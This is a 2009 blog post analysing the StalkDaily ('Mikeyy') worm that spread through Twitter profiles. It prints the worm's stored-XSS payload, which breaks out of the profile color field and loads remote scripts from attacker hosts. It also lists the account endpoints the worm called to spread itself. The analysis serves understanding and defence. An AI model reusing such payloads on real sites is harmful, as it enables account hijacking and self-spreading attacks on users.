Browse: Home / Life / StalkDaily Worm Analysis

StalkDaily Worm Analysis

By TrevorP on April 12, 2009

Update: This post covers a newer version of the worm. I have located the original code, and it is reviewed in a newer post.

The following is a quickly developed, haphazard analysis of the StalkDaily worm that infected accounts of twitter users on 12Apr 2009. Apologies for the roughness. It was done to satisfy my own curiosity. If you spot something clearly wrong, let me know. If anyone would like any further information, please contact me.

Observation

By observation, this worm does the following:

  • Causes you to tweet something like:
    • Wow…Mikeyy.
    • Mikeyy. Woooo!
    • Dude, Mikeyy is the shit! :)
    • damn mikeyy. haha.
    • Man, Twitter can’t fix shit. Mikeyy owns. :)
    • Twitter should really fix this… Mikeyy
  • Causes you to follow profile 28546293, or onedegrees
  • Updates your profile name to “Mikey Owns”
  • inserts a link to the worm code into your profiles color field

Unpacking

By comparing the accounts of infected and uninfected users we see the following code:

a { color: #</style>mikeyy:) “></a><script>document.write(unescape(/%3c%73%63%72%69%70%74%20%73%72%63%3d%22%68%74%74%70%3a%2f%2f%6f%6d%67%68%61%78%2e%75%75%75%71%2e%63%6f%6d%2f%77%6f%6f%2e%70%68%70%22%3e%3c%2f%73%63%72%69%70%74%3e/.source));</script> <style> <a ; }

This appears in the place where we would expect to see a css color element as follows:

a { color: #0000ff; }

This appears to be an injection into the twitter database, replacing the colour code of the page with JavaScript code. The JavaScript code instructs the browser to load the JavaScript code located at http://omghax.uuuq.com/woo.php. By watching proxy logs of a machine browsing infected pages, we see the following pages being accessed:

http://omghax.uuuq.com/woo
 http://omghax.uuuq.com/bam

This is explained by examining one of these scripts. Within the script is found the following strings:

  • Msxml2.XMLHTTP
  • Microsoft.XMLHTTP
  • connect
  • oUpperCase
  • GET
  • ?
  • open
  • Method
  • POST
  • HTTP/1.1
  • setRequestHeader
  • Content-Type
  • application/x-www-form-urlencoded
  • onreadystatechange
  • readyState
  • send
  • split
  • join
  • %27
  • (
  • %28
  • )
  • %29
  • *
  • %2A
  • ~
  • %7E
  • !
  • %21
  • %20
  • +
  • %
  • replace
  • innerHTML
  • documentElement
  • exec
  • Dude, Mikeyy is the shit! :)
  • Man, Twitter can’t fix shit. Mikeyy owns. :)
  • Mikeyy. Woooo!
  • Dude! Mikeyy! Seriously? Haha. ;)
  • Wow…Mikeyy.
  • damn mikeyy. haha.
  • random
  • length
  • floor
  • </style>mikeyy:) “></a><script>document.write(<script src=”http://omghax.uuuq.com/woo.php”></script>.source));</script> <style> <a
  • </style>mikeyy:) “></a><script>document.write(<script src=”http://content.ireel.com/jsxss.js”></script>.source));</script> <style><a
  • </style>mikeyy:) “></a><script>document.write(<script src=”http://content.ireel.com/xssjs.js”></script>.source));</script> <style><a
  • </style>mikeyy:) “></a><script>document.write(<script src=”http://omghax.uuuq.com/bam”></script>.source));</script> <style><a
  • </style>mikeyy:) “></a><script>document.write(<script src=”http://omghax.uuuq.com/woo”></script>.source));</script> <style><a
  • /account/profile_settings
  • POST
  • authenticity_token=
  • &user[profile_link_color]=
  • &commit=save+changes
  • /account/settings
  • &user[name]=Mikeyy+Owns&user[url]=
  • &tab=home&update=update
  • /status/update
  • &status=
  • &return_rendered_status=true&twttr=true
  • /friendships/create/28546293
  • &twttr=true
  • wait()

Analysis

Towards the bottom of this list you start to see some important elements:

  • /account/profile_settings &user[profile_link_color]= &commit=save+changes
  • /account/settings &user[name]=Mikeyy+Owns&user[url]=
  • /status/update
  • /friendships/create/28546293

While the code is obfuscated, and beyond my knowledge to easily decode, these strings provide some important clues. I would assume that the worm is calling URLs at twitter using these strings. Conceivably these would

  • Update the profile colour, inserting the worm code
  • Update the profile name
  • creating a friendship with onedegrees

Because the code is run inside the browser, in the context of normal page views by the logged in twitter user, the code “acts on your behalf”, to perform these actions. Neither the script, or the script author know your username or password, it simply “asks” the browser to perform these actions. Because you are already logged on in the browser, the action is performed as if you did it yourself.

Conclusion

I would estimate that the root cause of this problem is an JavaScript injection vulnerability in twitters color field, which now seems to be fixed. This allowed the worm to place JavaScript code inside this field, rather than the expected colour code which would normally be sent by the browser.

While not the cause, another vulnerability that allowed this to happen is the web-browsers in-built JavaScript engine, which runs any JavaScript code it is instructed to. This to me is not desirable. In effect, every time you visit a website, you are inviting some unknown person to run whatever JavaScript code they like inside your browser. This is historically the cause of many major security and virus problems, and will be into the future.

JavaScript is a useful tool in creating interactive websites, but must considered carefully. I recommend disabling JavaScript by default and only enabling it for sites you trust. The NoScript extension makes this easy.

Being that the malicious code in the StalkDaily worm was hosted on an external site, running twitters javascript code would not have allowed this worm to execute unless you also permitted code from uuuh.com to run also.

Posted in Life

Leave a Reply

« Avenged Sevenfold StalkDaily Worm Revisited »